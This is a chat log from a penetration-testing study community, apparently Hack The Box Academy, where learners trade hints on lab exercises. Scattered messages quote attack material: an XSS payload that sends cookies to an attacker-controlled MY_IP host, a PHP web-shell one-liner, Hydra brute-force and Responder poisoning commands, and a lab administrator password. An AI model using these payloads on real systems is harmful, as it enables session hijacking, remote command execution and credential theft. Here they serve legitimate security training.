#modules

1 messages ยท Page 86 of 1

steep loom
#

has anyone been able to do Attacking Thick Client Applications from the new ATTACKING COMMON APPLICATIONS if so please DM me. I have been bashing my head aginst this for a while and im getting pissed bucuse the memory dump keeps updating too fast and I cant do the last step. Thanks in advance ๐Ÿ™‚

acoustic owl
#

Generate the tokens and test them through

misty current
#

The commands I've tried are download options, So, is there any read options? or this is how it is.

autumn pilot
#

you might be missing something

misty current
#

My texts disappeared

#

Did I reveal something too sensitive? ๐Ÿ˜ถ

autumn pilot
#

a bit, the answer to the first question in the exercises

#

but you are on the right path, once you have some working credentials

misty current
#

I've completed the questions, it's just something I'm curious. Like why smbmap with null auth said I had read access

#

but yet, I wasn't able to download

#

or read with get file -

#

False positive?

misty current
autumn pilot
#

You need credentials to download it

misty current
#

I see.

steep loom
#

the application does not seem to be making the DNS querries like shown in the module. If anyone has done either of the thick client modules please hit me up ๐Ÿ™‚

rancid mulch
#

Module:ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Results:
Stuck on this one. Any hints would be appreciated.

  1. I located all three subdomains h.inlanefreight.htb, c.inlanefreight.htb and n.inlanefreight.htb. I might be missing one?
  2. Performed dig on all subdomains (dig any @white rock subdomains).
  3. Used subbrute on inlanefreight.htb.
fathom pendant
#

Note* I just tried this yesterday, and did indeed confirm you need to double check the spelling

rustic sage
#

why cant i specify the password without it erroring?

fathom pendant
#

Because bash is interpreting the !

rustic sage
#

how can i do it right

fathom pendant
#

Put the password in single quotes

#

Also spoilers

rustic sage
#

whops

#

nobody even saw it :)+

fathom pendant
#

Any password that has any special symbols put in single quotes

rustic sage
#

alright, i thought double qoutes ๐Ÿ˜ฆ

fathom pendant
#

Single quotes is literal string

#

Double quotes allows some parsing to still happen

rustic sage
#

what if a password is asd!O'

#

double single qoute it?

rancid mulch
#

@fathom pendant hi yes, the spelling is correct and the only thing in my resolvers file is inlanefreight.htb I was able to find the subdomains but whenever I try to do a AXFR transfer it fails. Tried adding subdomains to my hosts file as well but still nothing

fathom pendant
#

The subdomain is one of the first one that should appear

#

Dig should allow you to access it

#

Are you including the @\ipin your dig?

#

Fucking discord shir

#

BC some Dingus named ip

rancid mulch
#

nvm found it works now thank you @fathom pendant

fathom pendant
#

Remove the command as it's spoiling

#

But yeah it doesn't know what that resolved to lol that's why it failed

rustic sage
fathom pendant
#

What module?

rustic sage
#

Footprinting Lab - Medium

fathom pendant
#

That's the one with j* yeah?

rustic sage
#

j*?

fathom pendant
#

Username

rustic sage
#

how do i do the discord spoiler thing

fathom pendant
#

Just say yes or no if the username starts with j

#

Lol

rustic sage
#

mine starts with a

#

and ends with x XD

fathom pendant
#

Ok then I'm thinking a different one

#

Thank you xD

#

Look for some important documents

rustic sage
#

ohhh right

fathom pendant
#

That will contain some important login info

rustic sage
#

^^

fathom pendant
#

Hint: it's a windows machine. What other user could they be for

rustic sage
#

Admin?

fathom pendant
#

:)

rustic sage
#

What does ||the stop file -> windefend|| mean?

#

should i stop the process?

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

rustic sage
#

I'm in the Administrator's documents

fathom pendant
#

You're too far

#

Try SQL again

rustic sage
#

so back to the SQL software?

#

ok

fathom pendant
#

That was the whole point lok

rustic sage
#

what login name could a admin have?

fathom pendant
#

Also iirc you need to use local auth

rustic sage
fathom pendant
#

Which one do you think translates to local auth

balmy saffron
#

hello,

fathom pendant
#

Alternative is cmd line and running sqlcmd

fathom pendant
#

I gave you the second half

balmy saffron
#

I am in the pass hte ticket for windows and tired to xfreerdp into it using
xfreerdp /u:Administrator /p:"AnotherC0mpl3xP4$$" /v:10.129.204.53
But it doesn;t work. Is it normal?
I tried with evil-winrm as well.

balmy saffron
#

oh really? Let me try..

rustic sage
fathom pendant
#

FFS

#

Click all of them

balmy saffron
#

OMG thx it works......... I feel so stupid....

fathom pendant
#

See which ones work

rustic sage
#

none :/ i get: TITLE: Connect to Server Login failed for user ''. (Microsoft SQL Server, Error: 18456)

fathom pendant
#

There is one that will log you in

rustic sage
#

sa right

fathom pendant
rustic sage
#

๐Ÿฅฒ

#

admin

fathom pendant
#

As I said

#

Click all options

#

Try everything

#

Then come back if truly NONE of your attempts worj

rustic sage
#

i'm stuck ๐Ÿ˜ฆ

#

none of them worked

#

either with sa or admin

fathom pendant
#

And you tried all the login options from the drop down?

rustic sage
#

yes

rustic sage
#

ohhhhhhh

#

got it the flag, thanks yall.

fathom pendant
#

Just need * auth

#

Alternative is command line sqlcmd

flint laurel
#

Can someone help dumb Pass the Ticket (PtT) from Linux down for me.

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

i found the .kt cronjob but i am clueless on what to do next to get svc_workstations creds.

misty current
misty current
#

but didn't succeed to move further with the one you have

flint laurel
#

@misty current can I dm you

fiery berry
flint laurel
fiery berry
balmy saffron
#

Hello, I just completed Pass the ticket from windows...
But for the remoting part, I succeeded without understanding... ๐Ÿ˜ฆ

Can somebody explain where the
aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc

Is coming from? I did not see it when I dumped the hashes.

smoky chasm
#

Attacking common services: DNS i've used subbrute and have 4 subdomains, not sure where I go from here, not digging anything up. Help would be welcomed, go easy i'm dumb

fathom pendant
gentle root
#

Also, gz on Community Cont isn't that new?

fathom pendant
#

Relatively

thorn urchin
#

They stole it from me in my sleep

fathom pendant
#

Robbed in your prime

fallow delta
#

I'm stuck on the assessment. Compromised two users, one being the local admin on SERVER01 but not sure as to what krbtgt to steal

smoky chasm
keen compass
#

I am stuck on Password Attacks > Password Reuse / Default Passwords.
The question is :
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
What I have done :

  • used hydra over an SSH tunnel against server port 3306.
  • find a zip on the box (Notes.zip) password protected with a password from the mutated password list.
  • reuse of this password and the previously gatherd (from user sam) against the username.list file
    Any hint on this topic would be appreciated ๐Ÿ™‚
fathom pendant
#

Notes.zip is not required at this time

keen compass
#

ha ok

#

umm I just realized that I havn't put local users in the userlist

fathom pendant
#

Perhaps a look at history may help

keen compass
#

I checked it but was only having my own commands

#

(havn't checked it as soon as I log on... will try to reset the machine thanks)

fathom pendant
#

Just run head on it

#

/shrug

keen compass
#

I am currently reseting... I had looked at it too lately and the history was flushed I guess

#

merci !

keen compass
fathom pendant
#

This is pass attacks, reuse yeah?

#

Ohhhh

keen compass
fathom pendant
#

Yeah no use the default creds cheatsheet

keen compass
#

lol

fathom pendant
#

It's in there

#

:p

keen compass
#

ohh

keen compass
fathom pendant
#

Yeah there's only a few so it's easy to manually try

hollow finch
#

In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super! ๐Ÿ™‚

fathom pendant
#

ls -la?

#

Or dir

tribal field
#

should be dir for windows

#

im missing something obvious on a module if i could get some help

#

im smol ๐Ÿ˜”

fathom pendant
#

Ask your question

#

Instead of just complaining

#

:p

tribal field
#

:p

#

ok

fallow delta
#

Anyone free for a nudge on the Kerberos Attacks assessment? I am on the very last part, and have compromised two users (one is a local admin)

tender viper
#

For the Footprinting/imap+pop3, I'm having trouble answering the question What is the admin email address?. I found the cto.dev@dev.inlanefreight.htb but that does not seem to be the answer?

fathom pendant
tribal field
#

trying to get the flag for the exercise where you authenticate to a web server with admin:admin and use the dev tools to see what requests its making to find the flag, maybe its hidden in some js somewhere idk

tender viper
fathom pendant
#

Well first you have to get to the right folder

tender viper
fathom pendant
#

No

#

I'm referring to the 1 List "" * command referenced in the section

#

It helps to read and understand the section of the module you're doing

tender viper
fathom pendant
#

Refer to the commands listed in the section

#

It's literally right there

#

The only command I'm really having you modify is the 1 fetch 1 all to 1 fetch 1 body[]

#

Yes the brackets are important

tribal field
fathom pendant
#

Haven't done web requests but my guess is its network request or something in dev tools in webpage

#

ยฏ_(ใƒ„)_/ยฏ

tribal field
#

ok thanks, yeah I checked the main request and the other ones in the network tab expecting something to jump out like a new endpoint or something but there was nothing interesting

#

ill keep poking at it

keen compass
fathom pendant
#

Mostly memory some notes if I'm recalling it was a bit tough

#

Sometimes it's the fact that the info was right on the page on how to start the enumeration

#

That's always the first suggestion. Read the section thoroughly

#

Because 9/10 times you skipped over something

keen compass
#

I probably don't practice enough then ...

fathom pendant
#

The tougher it is the more I'll need notes.

keen compass
#

(or you often answer the same questions ? :D)

fathom pendant
#

It's usually the same question reworded

#

And the IMAP one specifically I've linked to articles containing useful IMAP commands

#

Because I needed those for doing it via command line

keen compass
#

indeed, IMAP tutorials were more interesting to me than the academy section content

fathom pendant
#

(there is a way to do it through an email client like evolution)

keen compass
#

who wants to do it using the GUI

fathom pendant
#

It's just the fetch example command that I have an issue with

#

Because it mostly gives garbage aside from just data info, but not the content of the email

thorn urchin
fathom pendant
#

This too

#

Though sometimes they're sneaky and it's directly in the example

thorn urchin
#

In which case I mean sorry bro but its a skill assessment lol

#

Yeah theres plenty of assessments that's just 'do these three sections instructions in order'

tacit vortex
#

hi iam having an issue with brute force hydra skill assessment wordlist got first question right but second it finds the password but it does not work hydra -l user -P rockyou.txt -f 188.166.151.118 -s 31557 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='admin_login'" i cannot get the flag as nothing lets me in thx

onyx rapids
#

Attacking Thick Client Applications - c:\programdata\restart-service.exe

Does anyone know how to make this restart-service.exe file appear in that folder? I've reset the box 5 times now and followed the instructions perfectly, but that restart-service.exe file has yet to appear. I've noticed that I can't run powershell on this box, so that seems like a problem if the lab involves running a powershell script.

Edit
Ok, it looks like it took roughly 6 restarts of the box for powershell to work.
I suggest before doing anything on this box, make sure powershell works and once you confirm that, then you can begin. If not then everything you do is pointless.

This section was not a great addition to the module. Information overload for someone who has never reversed before. Teach us how to walk before showing us to how run, it's useless knowledge that we won't absorb properly.

tacit vortex
thorn urchin
#

typically if hydra is giving false positives its cause the failure condition isnt quite right

#

also double check youre using the right parameters

rotund urchin
#

Can someone assist me with the password cracking Hard lab? I am not sure what to do with a file that I found.

rustic sage
#

I am having issuses finding a pathway on a linux pathway

rotund urchin
#

That is what I am trying to do. I can mount the share without issue but when I try and mount the vhd it asks for a passphrase and I am not finding anything online about cracking this type of file.

#

so not sure if I am missing something?

thorn urchin
#

did you ID what type of vhd it is

rotund urchin
#

I am not sure how to do that

#

in Windows or LInux?

#

I can run 'file' on it and tells me what OS

thorn urchin
#

what does it say

rotund urchin
#

Windows

#

This is all I really see, this is from another tool.

thorn urchin
#

You should be getting more than that

#

iirc its disk encrypted

rotund urchin
#

I see its GPT, but I havent found foudn anything useful about it

#

sorry screenshot cut off

thorn urchin
#

GPT is just a partitioning type

rustic sage
#

Mad can you help me after this?

thorn urchin
#

I could be misremembering this section. Its been a hot minute and my assessment notes arent the greatest

#

idk, im literally in my car about to drive home lol

rotund urchin
#

no worries, ill wait to see if anyone else can help

#

or if HTB reaches out

#

thanks man

rustic sage
onyx rapids
#

If anyone has a way to do Exploiting Web Vulnerabilities in Thick-Client Applications really fast, please reach out through PM. I skimmed through the section and none if it makes sense and it isn't explained, so I'm hoping to just finish it as fast as possible

rustic sage
onyx rapids
# rustic sage Not to be rude or anything. Try going a bit slower ask questions along the way a...

For sure, if I really wanted to, I could learn everything in this 1 section, but it would take me days to finish it and a lot of reading/research. I've searched the name of the section here on discord and there are over 30 results of people complaining, one mentioning wanting to commit suicide because of it. I've completed everything in this module except this part and don't find it helpful at all after looking through the material. I prefer to find a shortcut that would allow me to do the sql injection in the least amount of steps possible, so I can reserve my sanity for more productive modules. This module is considered medium and it seems really strange to have everything flow a certain way and then put in a section that's more difficult and time consuming than all 3 final assessments combined.

onyx rapids
rustic sage
#

Linux Basics

#

I am trying to find the mail file pathway

onyx rapids
#

Haven't done it, but I'll add module, which section and question

rustic sage
#

System info and the mail pathway question

onyx rapids
fringe shell
#

Someone doing the AD enumeration and attacks module? Think I just RDP'd into someones box that they'd been using lol got booted off 10 seconds later, so i imagine someone wanted it back ๐Ÿ˜…

rustic sage
#

Ok

#

What is the command sintax?

onyx rapids
#

Heck, you can even type "echo $MAIL"

rustic sage
#

How did that get past me when I pwd the mail directory

iron talon
#

Hi

upbeat shadow
#

web request

thorn urchin
#

web deny

fathom pendant
restive steppe
#

I'm still trying to figure out how to run 50064.rb in metasploit. I copied it to the same directory structure as exploitdb and updated and restarted msfconsole, but when I search for 50064 in msfconsole, I get no results

fathom pendant
#

Just use it

#

Literally

frigid ingot
#

@fathom pendant good evening, im hoping for a nudge in the right direction with Web Attacks if your'e available

fathom pendant
#

Haven't done it

frigid ingot
#

well alrighty then, no worries

frigid ingot
#

@acoustic owl I have not everything turned off now, Iโ€™ll be working on it tomorrow night if youโ€™re around

acoustic owl
frigid ingot
#

@acoustic owl Iโ€™m in San Diego right now

split sedge
#

anyone able to help me with the HACKING WORDPRESS User enum part please? i am unable to get more than the first user to be displayed via the curl command

autumn pilot
#

which section

mossy epoch
#

Hi, I'm with Linux Privilege Escalation - Skill Assessment, I'm stuck with flag5.txt, can someone help me? Any hints? Can I DM someone? I thin i'm pretty close to getting. Thx.

split sedge
#

section User enumeration

autumn pilot
#

use the provided outputs

split sedge
#

ive done that but only get ID1 back

autumn pilot
autumn pilot
paper rivet
#

Anyone can help me with module footprinting lab - easy? I know that i need to brute force ftp credentials. I tried ftp-brute.nse from nmap but it takes a long...

fiery berry
paper rivet
#

Thanks! I'm using (for usernames) the wordlists that htb provides in the footprinting module. But i don't know what wordlist use for passwords. Rockyou is so big...

#

I'm trying it with seclists

fiery berry
paper rivet
#

OMG thanks!

candid ocean
#

Can someone please DM me about the Attacking Common Services Easy lab.

acoustic owl
thorn urchin
#

<@&861185840277487616>

winged hedge
lyric raft
#

anyone else having problems with target machines? target machines are unpingable.

Scenario, its pingable at the beginning but once I xfreerdp into it, it disconnects after a few seconds

Module: Windows Privilege Escalation

stiff spoke
#

Ev everybody

#

Wb

#

I am new

lyric raft
stiff spoke
#

Hi

#

Do u know any course about wireshark

#

For free

quick cloud
#

yep @lyric raft it happened to me

lyric raft
quick cloud
#

ussaly restarting my pc fixed it

lyric raft
#

amma get to it later then, thank you!

quick cloud
#

np

dense quarry
#

i have a problem: curl: (6) Could not resolve host: admin.academy.htb
i added the ip+ admin.academy.htb in the /etc/hosts...

#

any idea and vpn is on too

eager hatch
#

Hello! I got a question about the Session Hijacking part of the Cross-Site Scripting module: is there a particular reason to load a remote script and not just have it directly executed once a Blind XSS is found?
Instead of having a js file with something like new Image().src='http://MY_IP/cookie.php?c='+document.cookie; and sending an injection to load it (eg <script src=http://MY_IP/script.js></script>)
why not just directly inject <script>new Image().src="http://MY_IP/cookie.php?c="+document.cookie;</script> ?
The main pro I see for the 1st method would be the ability to modify the code loaded by the users, but any other reasons?

eager hatch
rustic sage
paper rivet
#

I know the password thanks to the hint and i saw that it is in rockyou line 4000 moreless

#

But hydra does not find the password, and i would like to find it myself

dense quarry
eager hatch
rustic sage
#

got it ty

paper rivet
#

Anyone knows why appears the error permission denied(public key)?

#

When i try to connect by ssh

river skiff
#

Guys, any idea to whom can I write about a badge not showing up after a couple of modules are being completed ?

hollow finch
#

In the Password Attacks - Network Services module - "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." ----> found the user, got the list of shares and am only showing 1 with "READ" capability...the flag file does not seem to be found and using "ls" does not work. Anyone have any hints would be super!

river skiff
misty current
#

You need to connect to it with the correct private key

hollow finch
crisp remnant
#

Hello, can anyone assist a bit with the HTTP Attacks module

naive field
#

is this command okay, sudo responder -A -wf -f -v -I ens224

#

?

misty current
naive field
#

obtain user hashes

#

im doing AD enum and attack module

#

llmnt nbt-ns poisoning from linux

naive field
#

llmnr*

misty current
#

You could run the way you did but for llmnr and NetBIOS poisoning, I'd just run sudo responder -I tun0

#

It'll get the job done

fathom pendant
misty current
misty current
fathom pendant
#

If they're saying the ens* one, then it's a jump host

misty current
fathom pendant
#

If I'm recalling this exercise it's what they have you do

rustic sage
#

Hi can someone please help me with a FTP problem. I don't know why, but it always gives me a FTP timeout for some reason, am I doing something wrong?

misty current
#

Ah, for the modules. nvm, I was taking the convo to real life.

rustic sage
acoustic owl
rustic sage
#

result:

ftp: Can't connect to `10.129.58.190:21': Connection timed out
ftp: Can't connect to `10.129.58.190:ftp'
ftp>
blazing crypt
#

For Attacking Common Applications Attacking Tomcat

I cannot seem to find the password. Am I doing something wrong?

fathom pendant
#

Don't need to specify port

rustic sage
#

I didn't specify no port, I just typed ftp and the ip.

#

It take some time, but then I get a timeout error.

naive field
#

im doing the LLMNR and netbios poisioning on widnwos

#

and can not connect to rdp :/

#

anybody had similar exp?

#

i treid restarting the machine

#

checked 100 times the credentials and they are fine

fathom pendant
rustic sage
fathom pendant
#

What learning module are you doing on the HTB academy

#

Example:
Getting Started

rustic sage
#

Starting point.

fathom pendant
#

Correct?

rustic sage
#

Yes.

#

Currently doing the Fawn machine.

fathom pendant
#

Then this is the wrong place

rustic sage
fathom pendant
misty current
#

Attacking DNS Module, The target expires before the subdomain brute-forcing even completes ๐Ÿ˜ถ

acoustic owl
misty current
fathom pendant
misty current
fathom pendant
#

Dm me the ones you found

#

Oh

#

Wait

#

You did fuck uo

#

Look at your dig command

#

You're missing the .htb

#

:)

misty current
#

Ahh, True but I tried this command multiple time before and it did show me same error even with .htb

#

here's an older one

#

And, I think I just got 2 more when I thought the target died. No way they named one of the subdomain that, lmao

rustic sage
#

@unique yarrow

#

@slow flame

misty current
obtuse wave
#

Any body know how to access phones and computer (Apple devices) without passwords? I am asking for ethical hacking purpose.

misty current
#

Ahh, I did fuck up. Missing the .htb for the latest subdomain was the mistake. Thanks @fathom pendant

fathom pendant
#

:)

thorn urchin
#

Also I answered you on a diff server ๐Ÿ˜‚

blazing crypt
autumn pilot
#

give me a sec to go over my notes

blazing crypt
autumn pilot
#

you have added the entry to your hosts file, right?

blazing crypt
autumn pilot
#

sure, go for it

olive fiber
#

Hello to everyone, is someone from you doing the atplabs?

#

from prolabs

thorn urchin
#

youll find the correct channel after

fringe junco
#

I am trying to do "Windows File Transfer Methods" under File Transfers, but when I am attempting to RDP to the target, it keeps timing out and failing, this is from the PwnBox

#

I have tried resetting both PwnBox and target, but still timing out

#

Anyone had the same issue, or just me?

olive fiber
thorn urchin
fringe junco
thorn urchin
#

It does indeed

fringe junco
#

Ahh gotcha, appreciated!

thorn urchin
#

use one or the other never both at same time

#

๐Ÿ‘

keen compass
#

When doing a password attack against a domain controller, is it possible to use the LDAP module of CME instead of SMB ?
LDAP should be faster imo but I am not sure if everybody can authenticate to LDAP (and cme ldap -u 'user.list' -p 'pass.list' gives me error messages suggesting LDAP may not be available Error connecting to the domain, are you sure LDAP service is running on the target ?)
and TCP/389 is opened, yes

thorn urchin
#

I havnt tried messing around with the cme ldap module, but done some messing around with ldapsearch

#

you could probably script that but idk if its actually be any reasonably faster

rustic sage
#

Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land

i am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I found the one filtering that disabled account : (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)

but not sure about the administrative privileges

can anyone help me?!

keen compass
rustic sage
#

yeah

keen compass
#

can't you use it to identify priviledged accounts ?

rustic sage
#

yeah but like this module asks me to do with ldap filter so

keen compass
#

ha ok sorry

rustic sage
#

trying to understand those filters haha

keen compass
#

and using something like (&(objectclass=group)(CN=Domain Admins)) ?

rustic sage
#

okie i should try that one i guess

#

ty!!

rotund urchin
#

I am still struggling on the password attacks hard lab. I have everything I need to mount the VHD file (including password), but nothing is working. I try and list partitions, but there arent any?

thorn urchin
#

mounting it in Linux was a bit of a pain but doable. If youre struggling the intended route is to mount it from windows.

rotund urchin
#

ill try that first I suppose

acoustic owl
rotund urchin
#

yeah i looked at that too, but my issue is that its not showing any drives or partitions

#

i dont get it

keen compass
#

On "Attacking Active Directory & NTDS.dit" with the question :

On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

I have created a user.list using the provided firstname/lastname with the tool username-anarchy
Run cme smb with the user.list and the password list provided in the ressources.
I am not getting successful.
Is there a way to bruteforce faster than cme smb so I could consider using bigger password lists perhaps ?

acoustic owl
# rotund urchin i dont get it
sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uYOURPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
rustic sage
#

anyone completed last question of SQLmap Essentials? Any tips for where is the POST request??

zinc marsh
#

Too expensive the game hacking fundamentals in my opinion, for what it is

rotund urchin
rustic sage
zinc marsh
#

burpsuite why

rustic sage
#

to see all requests

marsh veldt
#

Good to all, I am having problems with the module: "Network Enumeration with NMAP" in the section of "Service enumeration", I do all the Nmaps that indicate in the module, even I investigate a little and I take out the banners with the script "baner" or with a netcat. But whatever I put in the answer, I can't find the solution, do I have to connect to any of the devecot found, and if so, how? I can't find passwords anywhere apparently.
The result of the nmap is the following:

PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
80/tcp open http
110/tcp open pop3
|_banner: +OK Dovecot ready.
139/tcp open netbios-ssn
143/tcp open imap
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID.
|_ENABLE IDLE LOGINDISABLED] Dovecot ready.
445/tcp open microsoft-ds
31337/tcp open Elite

marsh veldt
# keen compass which question ?

Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. I was reading another answere, but i am stuck now

rustic sage
keen compass
rustic sage
keen compass
marsh veldt
#

I tried also with scripts of nmap and similar things. But i not found anything. I think that maybe i didnt see something.. but i spent a lot of hours in this :(((

keen compass
#

you can do banner grabbing using netcat

#

some services may takes too much time to answer and nmap might not get info you will get using nc on targetted port

marsh veldt
#

OK, i will tryยกยกยก if I get it (or not hehe:( ) I'll let you know ๐Ÿ˜„

#

FOUND ITยกยกยก was the banner, i dont know reason but in last port not show banner correctly with nmapยกยก Thanks you so much

keen compass
supple patio
#

Hello everyone!
Module: Password Attacks
Section: Attacking Active Directory & NTDS.dit
Last question. I can't copy the ntds.dit file. I already did the copy of "C:" 2 times(that's why there is harddiskvolumeshadowcopy<2>)

#

solved)

zinc marsh
#

damn just 15 people

umbral mist
#

Can I DM someone about Attacking Common Services - Easy? I've got the user, got access to ||mysql|| and know I need to ||upload a web shell|| but when I do that ||I get a 404 error navigating to it||

umbral mist
#

nevermind, for those looking back I fixed it by doing / instead of \ in the ||sql query||

unique valve
foggy light
small sage
#

~~hello, working on Linux Privilege Escalation skills assessment flag5
I've found the binary that the user can run as sudo, but when I try using the command from GTFOBins

!/bin/sh```
I get /bin/sh not found
am I doing something dumb?~~
I was doing something dumb
restive steppe
#

I noticed you resolved the "Unexpected json response" error. I'm getting the same error. Any hints? I've tried using different payloads

#

Did you get it resolved? The exploit did not show up for me by searching for 50064 in msf however "using" it allowed me to configure it and run the exploit. I ran into another error though

summer flame
#

hi all, can someone advise for File Inclusion module, what does the hint '..see what path the regular functionality uses'?

small sage
obsidian yacht
#

sup

rustic sage
#

hello guys for the Active Directory Enumeration & Attack: Kerberoasting - from Linux, do we have to crack the password for user "forend" ?

#

seems like previous password doesn;t work ๐Ÿ˜ฆ

fringe shell
terse igloo
#

may i get assistance with a module, possible issue with content

fathom pendant
#

Just ask your question

acoustic owl
#

Here everyone gets support with the modules. What is it about?

supple patio
acoustic owl
#

Ask HTB why

misty current
terse igloo
#

can i post photos&&files here?

supple patio
terse igloo
#

i think i may have gotten the wrong data back to a table not askexd for , however i need a second opinion if [possible

fathom pendant
#

Try checking for phantom spaces before and after your answer

misty current
#

You're searching for the wrong table, remember to view and intercept the request on case#3 page and modify your the position where you want to insert payloads accordingly

fathom pendant
#

But also please remove your photos and upload ones with answers edited off

#

The answer you have is flag1 as shown in the output as well

safe fog
#

Is there anyway to reset you're learning path and progress

misty current
safe fog
#

where is that option att??

misty current
#

It's usually at the completion page where you get redirected after finishing a whole module. I think you can access it directly by just accessing the last section of the module and hitting the 'Finish" button

terse igloo
fathom pendant
#

please actually remove the images tho as they still spoil content

misty current
fathom pendant
#

They did it

terse igloo
fathom pendant
#

Just delete it

terse igloo
#

aw got it

#

not use to discord, mor e irc and telegram user

fathom pendant
#

Also your file didn't have an extension

#

So it wasn't going to load

terse igloo
safe fog
#

hmmm not seeing anything like that

terse igloo
#

sorry for the delay, this is why i asked another fellow in another chat to assist via dm, to prevent sharing the answer content, however since it pertained to answering i felt need ot leave the answer open to see if it was accurate

#

so i am sorry for that ๐Ÿ™‚

misty current
supple patio
#

just the same as "view" on dashboard

misty current
#

Ah, never used it. That's all it does huh.

supple patio
safe fog
supple patio
#

i am always trying to reread๐Ÿ˜‚

supple patio
modern falcon
#

Password attacks > Pass the Hash: Can someone give me hint on how to get the NTLM hash of David account? I tried to use crackmapexec --lsa but the hash dumped by that command is not accepted as the answer

neat pond
#

Hi, working on tier 0 modules started with file inclusion one, but on the third section under File Disclosure "php filters" it tells me to fuzz an application and I haven't done that module, should I swap modules ? and finish Ffuf first ?

modern falcon
#

I tried mimikatz with the given Administrator hash. Do I need to find a way to logged in as david before running mimikatz?

fiery berry
misty current
#

when it comes to dumping secrets, Mimikatz just does it better as far as I've heard.

fiery berry
#

at the end is the same using mimikatz to dump the creds in memory

misty current
misty current
#

Also I don't remember for this particular section, Maybe David is a local user on that machine? you'd need to dump the SAM then

fiery berry
modern falcon
modern falcon
fiery berry
thorn urchin
#

You might just not be submitting the right hash, or having the format wrong

karmic wren
#

What role ensure that obj in a domain are not assigned the same SID ??? In introduction to Active Directory

#

Why it is not accepting my answer.

autumn pilot
#

usually, this happens when it is not the correct answer

karmic wren
#

RID master is the answer but it says wrong

autumn pilot
#

well, because perhaps it is expecting it to be in an another form

karmic wren
#

Found it thank u.

warped bison
#

Having the same problem now, how did others who completed the path beat this one?

boreal basalt
#

Hi guys i have a questions about the module File Inclusion

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

this is work but why the next command don't :

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php

#

zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)

misty current
#

which section in File Inclusion module are you doing? @boreal basalt

loud yacht
#

why hydra always give me wrong password

#

hydra -l user -P rockyou.txt -u -f IP -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F<form name='log-in'"

#

what am i doing wrong

quick cloud
#

is it https or http?

#

-u flag is for SSL connection?

autumn pilot
#

also are you sure that "user" is actually the username

loud yacht
#

http

#

i think im sure

quick cloud
#

remove the -u then try

stone jacinth
rustic sage
#

Guys

#

In the file upload

#

Why any php code does not executed

#

It said always xml processing not supported in html ??

red meteor
#

Hi how can download and execute a file in powershell 2.0?

naive field
#

on AD enum and attacks password spraying making a target user lsit

#

it say

#

says*

#

" Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint? "

#

how do i know what is the ATTACK01?

loud yacht
misty current
loud yacht
#

is there anything i should fix in the command?

#

the password still not correct and hydra's result always changes

misty current
#

What's the section name for this module?

loud yacht
#

login brute forcing skills assessment - web site

#

question2

#

oh i got the answer now.

#

i forgot to put = after :F

#

thanks man

misty current
#

Good job finding it on your own ๐Ÿ‘

dusk olive
#

Hello all. I'm doing the module Getting Started and for some unknown reasons the server at public exploits section is down. I tried refreshing, using pwnbox but no success. Someone help

#

Got it thanks

narrow solar
#

Good morning everyone ๐Ÿ˜Š
I am in password attacks, credentials hunting in Windows
When i use lazagne.exe it closes the prompt as soon as the scan ends, i can't view the results

opal jewel
#

Where does one find Intro to Zephyr track?! Cant seem to locate such track

fathom pendant
opal jewel
#

I was thinking it will be one of the modules...Thanks Marcie!

nova dove
#

guys i need help for stack based buffer overflow on windows x86 module / part // remote fuzzing m stuck here from 2 days pls help

#

@opal jewel can u help u r pro

fathom pendant
nova dove
#

@fathom pendant i m connected to windows machine using rdp okay ,, i also made a python script that will send buffers 500 and +500 everytime but i m not getting how they used the script

#

@fathom pendant can u join vc so i can show

fathom pendant
#

No

nova dove
#

@fathom pendant why

opal jewel
#

Try a secondary resource to maybe get another explanation on bof

#

Tib3rius has a good guide and TCM on youtube offers an easy explanation

fathom pendant
misty current
opal jewel
#

I found it already. Thanks!

glossy ore
#

btw, i love the integrated terminal, but wish i could pop it out to a new window like pwnbox

misty current
glossy ore
#

oh yeah that's a decent idea

rotund urchin
#

Has anyone here done the attacking FTP service module recently? It is not accepting any of my flags/answers. Very confused lol.

#

I brute forced FTP using the resoruces file and got a hit on a user, but it wont accept the answer for the 2nd question. I also SSH'd into the box using the account I found and got the flag for the last question, but it is not accepting it either.

acoustic owl
#

Reload the module page.
Sometimes the answers are not accepted. After you reload the Academy page, it works again.

rotund urchin
#

